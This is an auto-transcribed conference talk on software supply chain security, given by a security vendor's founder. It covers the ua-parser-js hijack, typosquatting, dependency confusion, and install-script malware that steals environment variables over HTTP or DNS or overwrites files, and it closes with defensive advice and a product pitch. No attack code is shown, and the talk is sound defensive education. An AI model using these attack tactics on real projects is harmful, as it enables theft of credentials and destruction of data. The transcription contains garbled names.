How to Secure Your Software Supply Chain – Practical Lessons To Protect Your App

Talk

How to Secure Your Software Supply Chain – Practical Lessons To Protect Your App

Continuous Delivery
UXDX APAC 2022

Open source code makes up 90% of most codebases. How do you know if you can trust your open source dependencies? It is critical to manage your dependencies effectively to reduce risk, but most teams have an ad-hoc process where any developer can introduce dependencies leaving organizations open to risk from malicious dependencies. Software supply chain attacks have exploded over the past 12 months and they’re only accelerating in 2022 and beyond. We’ll dive into examples of recent supply chain attacks and what concrete steps you can take to protect your team from this emerging threat.

Hello, and welcome to my talk on how to secure your software supply chain and practical lessons to protect your app. My name is Feross, and I'm the founder and CEO of Socket, an open-source supply chain security company. And I'm also an instructor at Stanford University, where I teach the web security course, as well as the creator of hundreds of open source projects, which are downloaded 500 million times per month, including standard Jas, a popular community JavaScript style guide, and web torrent, the first browser BitTorrent client. In the past, I also used to be a board member of the Node js Foundation, as well as a consultant for the Silicon Valley TV show, which was a pretty fun job. A little bit about my company's Socket. So Socket is a cybersecurity platform that protects companies from software supply chain attacks. We're auditing every open-source package to detect supply chain attacks, such as malware, typo squats, hidden code, and misleading packages. And to block it in real-time. Customers include 1000s of top tech organisations. Now let's get started. So let me tell you a story. On January 13, 2012, over 10 years ago, a developer named Faisal Solomon published a new project on GitHub. It was called UA parser. Jas, it was a user agent string parser. Lots of people found it useful. And over the next 10 years, Faisal continued to develop the package with help from many open source contributors, publishing 54 versions, and the package just continued to grow in popularity. Eventually, it grew to 7 million downloads per week, and it was used by over 3 million GitHub repositories.

Let me tell you a story. On October 5, 2021, on a notorious Russian hacking forum, this post appeared. A hacker was selling the password to an NPM account that controlled a package with over 7 million weekly downloads. If you hadn't made the connection, that's the same package as before. So two weeks later, you are a parser. Jas was compromised.
And three malicious versions of this package were republished, and malware was added that would execute immediately whenever anyone installed one of these malicious versions. So what I want to do now let's actually jump into that malware and give you a peek to see what it did. So this is the package JSON file that makes up the package. And I'll draw your attention to the new version here, as well as the pre-install script on this line. And this script is just simply running a file called pre-install dot j s, which is where the malware lives. So if you open up that file, here's what it looks like. The first thing you'll notice is that different code is running on each platform. So, Mac, Windows, and Linux have different code paths, their Mac users are lucky, and nothing actually happens on that platform. But on Windows, this file is executed here pre-installed dot bat. And on Linux, a similar file is pre-install. She is executed. So let's open up those files and dig in. So the first thing you'll notice is that the user's country of origin is fetched based on their IP address. And if they come from Russia, Ukraine, Belarus, or Kazakhstan, then the program actually just exists, and nothing happens. And this is actually pretty common in malware. And it's done, presumably because the attacker actually lives in one of these countries. And they're attempting not to antagonise their local law enforcement.

So if you're not in one of these countries, and the malware continues, and you'll see here, it's looking to see using P grep whether the application is actually running. If it is, then it'll end. Otherwise, it'll actually download the malware and then prepare it for execution and execute it. And if you look at the arguments here, you'll notice this is actually a cryptocurrency miner, specifically the mantra miner. And so what this is going to do is it's going to use up the resources on whatever machine is unlucky enough to install this, whether it's your personal laptop, your build server, or maybe even your production server. On Windows, the malware is very similar. It follows a very similar process of downloading this minor and but it also downloads an additional file here, this DLL file. And after starting up the minor, it will also register that DLL, which turns out is pretty nefarious. So that particular file will actually steal passwords from 100 different programs on the machine as well as anything in the Windows Credential Manager, which, you know, includes the user's passwords.
So this is pretty bad and obviously not something you want to run on your machine. So, you know, the aftermath of this was that the maintainer? You know, I apologised, and, you know, you sent a message to NPM support to get this package taken down. It was published for a total of four hours. And anyone who installed the package during this time period was compromised. So that means any software builds that were done in projects were compromised. Anyone who updated to this version or merged the pull request to this new version would have been compromised. So, you know, a very unfortunate incident. You know, this was big news in the JavaScript world. You might have even heard about this back in October. So a lot of libraries that are used by big companies, you know, created by big companies like Facebook, were actually affected because they depended upon you as a parser. Jas. So this is actually just the tip of the iceberg, though. This one incident drew a lot of attention to this issue in October, but there have been many incidents since November. There was another similar incident with a cryptocurrency miner in January. There was an incident with a maintainer sabotaging his own packages. In March and April, there were incidents of protests, which are basically people sabotaging packages in order to make political statements. So this is really just the tip of the iceberg.

We've seen 150 different packages moved for security reasons in just the last 30 days alone. So this trend seems to be accelerating. And attackers are really taking advantage of the, you know, the trust in the open-source ecosystem. So one question you might ask is, why is this happening now? And I think it comes down to really four reasons. So the first reason is that 90% of an app's code comes from open source. So really, open-source has one open-source that has enabled teams to build powerful applications in days or weeks instead of months or years. And, you know, open-source works because anyone can inspect the code, anyone can contribute, anyone can publish a package. And open source communities are trusting by default. Good contributors are rewarded with recognition and eventually publish rights. This is also the reason why you know your NPM node modules folder is often one of the heaviest objects in the universe. The other reason is that we have lots of transitive dependencies.
So the way we write software has really changed in the last decade. We use dependencies a lot more liberally. And that leads to 1000s of dependencies in most projects. So let's just take one example here. So let's look at discord, a popular chat application. So discord is an electron app, and it's built on a massive amount of open source. As you can see here, it's around 19,000 Total packages. And with code contributions from 300,000 different contributors from 206 different countries. So just a mind-boggling amount of open source in an app like discord. And, you know, you know, this, this is aided by the sort of the way that the packages are written in, you know, in the modern times. So, a 2019 paper found that installing an average NPM package introduces an implicit trust on 79/3 party packages and 39 maintainers, creating a really surprisingly large attack surface. So, you know, we actually had socket made this visualisation here to kind of give you a sense of what a dependency actually looks like. So this is the Web pack dependency that's very, very common. It's probably, you know, building your front-end server right now if you have one. What you see here is every grey box is a package. And every purple box is a file within a package. So you'll see here is we're sort of peeling back the layers of taking off the grey, you know, opening up the grey box to seeing the files inside, and also the nested packages within that. And, you know, as you can see here, there's just a lot of code and a lot of different packages to make up the Web package.

The other kind of reason is, you know, no one reads the code today. So, you know, basically what we're doing is kind of crazy. We're downloading code from the internet, written by unknown individuals that we haven't read, that we execute with full permissions on our laptops and servers, where we keep our most important data. And when you think of it like that, it's actually a miracle that this system works at all and that it's continued to work for so long.

You know, another kind of problem with the reason why people don't read code is that NPM doesn't make it easy. So if you open up the website, and you just go to this Explore tab here, you can't actually even see the code that you're going to be downloading when you're selecting a package. So developers actually have a pretty hard time making good decisions and actually read the code here.
They often have to resort to clicking on the GitHub link and going to GitHub to read the code. But attackers can publish different code to NPM and GitHub. Often the code is different in the associated GitHub repository. And attackers actually know this and will take advantage of this. In fact, NPM does not guarantee that the code on GitHub matches the code on NPM. So, no one is looking at the code. You know, hopefully, you know, you might think that's okay. Linus Torvalds has this quote about how given enough eyeballs. All bugs are shallow. And to some extent, this is true. But if everyone is relying on someone else to read the code, then who is finding the malware. So this is maybe why an average, you know, the malicious package is available for 209 days before it's publicly reported. This is from a 2020 research paper. And I personally find this number very shocking. Another paper in 2021 found similar results, including that 20% of the malware persists in package managers for over 400 days and has more than 1000 downloads. Finally, the last reason why this is happening now is that popular tools give a false sense of security. So it's very common to use vulnerability scanning tools to tell you whether open source is safe or not. But scanning for known vulnerabilities is not enough. The entire security industry is obsessed with scanning for known vulnerabilities and approaches, which is too reactive to stop an active supply chain attack.

Vulnerabilities can take weeks or months to be discovered. And in today's culture of fast development, a malicious dependency can be updated, merged, and running in production in days or even hours. And this really isn't enough time for a vulnerability report to be created and to make its way into the vulnerability scanning tools that a lot of teams use. So really, what it comes down to is supply chain attacks, and vulnerabilities are very different, and they need different solutions. So if vulnerabilities are accidentally introduced by open source maintainers, it's sometimes okay to ship these to production if they're low impact. Supply chain attacks, on the other hand, are intentionally introduced by an attacker, and it's never okay to ship such code to production. It's never okay to ship malware to production. You must catch it before you install it or depend on it in your application. So vulnerability scanners will not catch the next supply chain attack. So now that we kind of understand why supply chain attacks are happening now let's dig a little bit into how a supply chain attack actually works.
So there are two types of things I want to talk about. So there are attack vectors, as well as attack tactics. So vectors are kind of how the attacker tricks you, and tactics or what the code actually does when it runs. So let's start with attack vectors and how the attacker tricks you. So the first and most common attack technique is hijacked packages. So these are often the source of a lot of the headlines that you see in the news around, you know, supply chain attacks and open source packages that have been compromised. This is the same thing that happened in the example that we started this talk with UAE parser Jas. Packages get hijacked for a number of reasons could be as that the maintainer chose a weak password. That's what happened in the case of you, a parser. Jas, it could be the maintainer themselves giving access to a malicious actor by mistake.

Maintainers can become malicious themselves. That actually happened in January. Maintainers can also use their packages to protest. And maintainers could also just get malware on their laptops. And all of this is exacerbated by the fact that NPM doesn't enforce FA though this is starting to somewhat improve in recent times. So yeah, the next tactic is typosquatting. So typosquatting is a pretty nefarious trick. So if you look at these two packages here, one of them is real, and one of them is fake. But you might be hard-pressed to guess which is real and which is fake. I'll just tell you. The first one is real. The second one is fake. And if you were to make the mistake of installing the fake package, you would get greeted with a nice supply chain attack.

So what you have here is the contents of a fake package. And as you'll note that the line here says that, you know, a script is going to run automatically. Suppose we open up that file to see what's inside. We're greeted with a completely obfuscated file. So you know, even without being able to decipher what this code does, it's very clear this is not something that you should be running on your machine or on production. This is not going to do anything that you want to do. That's good. So let's talk about the next tactic. So dependency confusion.

Dependency confusion is closely related to typosquatting, but instead of relying on, you know, the user making a mistake about the specific dependency that they install this, this attacker works when a company publishes packages to their own internal, private NPM registry and they use a name that hasn't been registered on the Public Registry. And so an attacker can come along and register a package with the same name but on the public registry, and then later, some internal tools may get confused and use the public version of the package instead of the internal version. So that's why it's called the dependency confusion attack. There's been plenty of examples of this recently. You know, many companies were affected, just looking through the recently deleted NPM packages, we found a bunch of likely dependencies confusion attacks. Most of these had malicious code in them.

And all of these packages have Names that appear to conflict with likely internal package names. So you can see here all kinds of organisations were affected, including really large companies and the federal government, and there's even more on this page here. So you know, this is really quite a widespread problem. This also isn't helped by the fact that NPM recently had an issue where they lost, you know, some data on these private package names and leaked them. And so that even made the attacker's job even easier to pull off this attack because it could just pull a list. Alright, so now let's talk about tactics. So what does the attack code do? So once this code is running on your machine, what's it actually going to do? So the most common thing by far is to install scripts. Most malware is in uninstall script. This is because, you know, if you're an attacker, why wouldn't you want your code to run automatically the moment that the user installs the package. So in 2022, a paper found almost 94% of malicious packages had at least one install script. And unfortunately, install scripts have legitimate uses.

So it's not an easy solution to just disable them. So, you know, this is, you know, again, we've already seen many examples of this. But you know, this, this single line here is enough to cause malware to execute automatically. Now, let's talk about the second tactic of stealing data. So this is very common in a lot of the malware that we see on NPM.
So if we take that last example again, and we dive into these scripts here that it's attempting to run, this is a very common example. This is a very, very frequent example of a piece of malware that you'll see on NPM. So you'll see it's making an HTTP request. And the data that it's sending from your system is going to this domain here. And the data that's actually being sent is processed dot envy, which is your environment variables. So that means you know, your tokens, your, your, your keys, whatever environment variables are in the environment are going to get exfiltrated by this by this script here. There are different techniques that attackers like to use. So sometimes, an HTTP request can get blocked by a firewall. And so there's also a DNS technique. So this uses a DNS lookup to exfiltrate the data, it puts it into the subdomain of the URL, and it again sends the environment variables off to the attacker. And the attacker can, of course, use this data however they like. They can post it online. They can use it to break into your systems or whatever they feel like.

And finally, the last tactic is to delete or ransom your data. And some examples of this are the recent protests where we've seen peace, not war, and note IPC. So we'll actually take a look at that example here. So this is a piece of malware written by some activists who wanted to make a statement about the war in Ukraine. And so they, you know, included this code in their package. And if you take a close look at it, it's, you know, it's a little bit obfuscated here. But the key, the key line, is down here, where it's basically going to iterate through all the files on your machine and write garbage data over them. So effectively deleting all your files. So not a friendly piece of software, not something that you want to be running on any machine that says yours. So how can you protect your app? This is where we talk about actual potential solutions to these problems. So the first thing you can do is to choose better dependencies.

If you ship code to production, you are responsible for it. So we really need a mindset shift as developers, you know, node or, you know, you're the process that's running your code doesn't care whether that code was written by you as the developer or whether it came from open source. You know, it's this mindset of, you know, it's not my problem because it's an open-source need to change.
Because ultimately, you know, it's all going to run in the same program. And, you know, and no, doesn't care who wrote the code. It's all part of your application once it's bundled up and running in production. So certainly, we need a mindset shift around this. And if you look at the actual, you know, open-source licenses that are part of all the open-source packages that you consume, you know, the most Popular licensed MIT license literally says this it says open source is provided as is, without warranty of any kind, in no event, shall the author be liable for any claim damages or liability. So, you know, this is actually the truth. So you're, you know, you're ultimately responsible for the code that you do, open-source code that you take in that you run on your production servers. So, we need to do a better job of picking dependencies. So how do we do this? So, you know, most of us aren't going to look at the actual code.

So we look at heuristics. We look at signals that give us an indication as to whether an open-source package is high quality and trustworthy. So we look at things like, you know, first of all, does it get the job done? Doesn’t have an open-source license, so we can use it? Does it have good Docs? Does it have a lot of downloads and GitHub stars? Does it have recent commits? Does it have types? And, you know, does it have tests? And, you know, this is good stuff to look at. But you know, it doesn't really dig deep into the package. And it's not really going to give you an indication about whether the package has malware in it or not. So you know, most of the time, this is going to work. But occasionally in you know, those rare cases where a package is compromised, that you've been, depending on if it might, it might check all these boxes, but it still could get affected. So we really need to dig a little deeper. So I'm going to show you an example of a tool. This is the tool that we built a Socket that can actually dig into the contents of the package and tell you what it does. There are probably other tools out there. But this is a good example of what you can do with really good static analysis.

So here we have the package buffer util. And you can see that it's going to run code automatically on installation, and it's going to run some native code. It's called that right there on the package page. This package actually turns out to be totally benign.
But what about something sketchy? What about a package that's doing something kind of weird? What would that look like? So here's the package, it's quite popular. And it's, you know, it puts a little overlay on the page. It's a react-like overlay component. So it's just a web component. But if you dig into its dependencies, you'll find that it's actually doing quite a lot of interesting things. So you'll see here that it has code that runs automatically and as telemetry, which means it's sending tracking code back to the maintainer. So it's tracking who installed the package, and it does a bunch of other things like run shell commands and access the network. So this is worth digging into a little bit further. And if you click here, you can learn a little bit more about what this package is actually doing. Now, let's take a look at an actual piece of malware. So here's a piece of malware.

If you were to look it up on Socket, you'd see that we've detected that it's going to run code on installation, and that accesses the network. If you click in to, you know, the alerts there, you'll actually get jumped straight to the line of code where it actually does the given behaviour. So you'll see here that it's, the package is accessing environment variables on this line here. And you'll see it here. It's just sending it off to some server on the internet. So a typical kind of data theft attack. So make sure to, you know, make sure to take a close look at the dependencies that you use. The next tip is to kind of update dependencies at the right cadence. So a lot of us are using bots, like depending on a boat to, you know, to stand the latest version of code. And that's usually a good security practice. However, the quicker that you update your dependencies, the fewer eyeballs that have had a chance to actually look at the code. And so, you know, there's, there's really a trade-off here. So how quickly should you update? This is a really tough question.

So, if you update too slowly, then you're exposed to known vulnerabilities. And that's not good. If you have too quickly, though, you're exposed to supply chain attacks because now you're running code that no eyeballs have looked at no one's seen yet. So it's really, there's no good answer here. And you know, there are really just trade-offs all around.
But this is something to at least think about as a team and kind of come up with a policy for what you want to do here. Okay, so the third thing you can do is use automation for auditing every dependency.

So how closely should you actually audit a dependency? Again, there's kind of a trade-off here. So you can do a full audit. A full audit means reading every single line of code of every dependency in your project. If you do this, it's thorough. It's the best in the class thing you can do. But it's a lot of work. It's also slow and time-consuming and therefore expensive because it takes a lot of time to properly audit that much code. On the other hand, a lot of teams are doing nothing. And if you do that, then you're vulnerable to supply chain attacks. You're just running code that you haven't even audited or looked at in any way and hoping that it's good. So this is risky, and it can be expensive in a different way. It can be expensive in terms of PR cost to the company or in terms of breaches. So really, the happy medium here is to lean on audit nation. So then, you know, what we recommend is using static analysis to audit every dependency and detect indicators of packages doing suspicious things such as using privileged APIs like the file system, or the network, or containing obfuscated code. If you detect packages doing these things, then you can manually audit just those packages, just the most suspicious packages. And that way, you can spend security team resources on the, you know, the highest impact tasks instead of, you know, doing an all or nothing.

And if you do this, and you put the security information directly in pull requests so that developers can see it, then you empower developers to solve security issues before they're deployed into production. And you can find these attacks before they affect your users. So our final recommendation, and I know I'm biased here, is to consider using a Socket to do this. So you can use the tool, as we showed earlier, to research packages. So this is free tool-free for the community. Anyone can use this, you can look up packages, and all this data is open and accessible. And feel free to do this when you're considering which packages to use or when you're auditing an application. But we also have the ability to monitor pull requests for bad dependencies. So you know, this gives you kind of an active way to monitor for bad dependencies before they're merged in.
So this is what it looks like: it's a bot. It will come to your pull request and leave a comment telling you what issues are present in this dependency and give the developer the information that they need to really make an informed decision about this dependency. So if you're interested in this, you can install it for free at Socket dot deaf. And, you know, I want to end on a kind of positive note here and just say that you know, I want you for supply chain security. I think developers and security practitioners and really entire teams need to change the way they think about dependencies in order to solve the software supply chain security crisis that we're in right now. You know, we need a mindset shift around dependencies, and we need to think of them as part of our apps. And you know, they are a part of our apps. And we need to really understand the threats that are out there and what steps we can take as teams to protect ourselves from this emerging threat. And with that, I'll end, so thank you for having me here. I appreciate it. My contact info is here on the slide if you're interested in reaching out, and also, just shout out that we're hiring developers at the Socket. So thanks.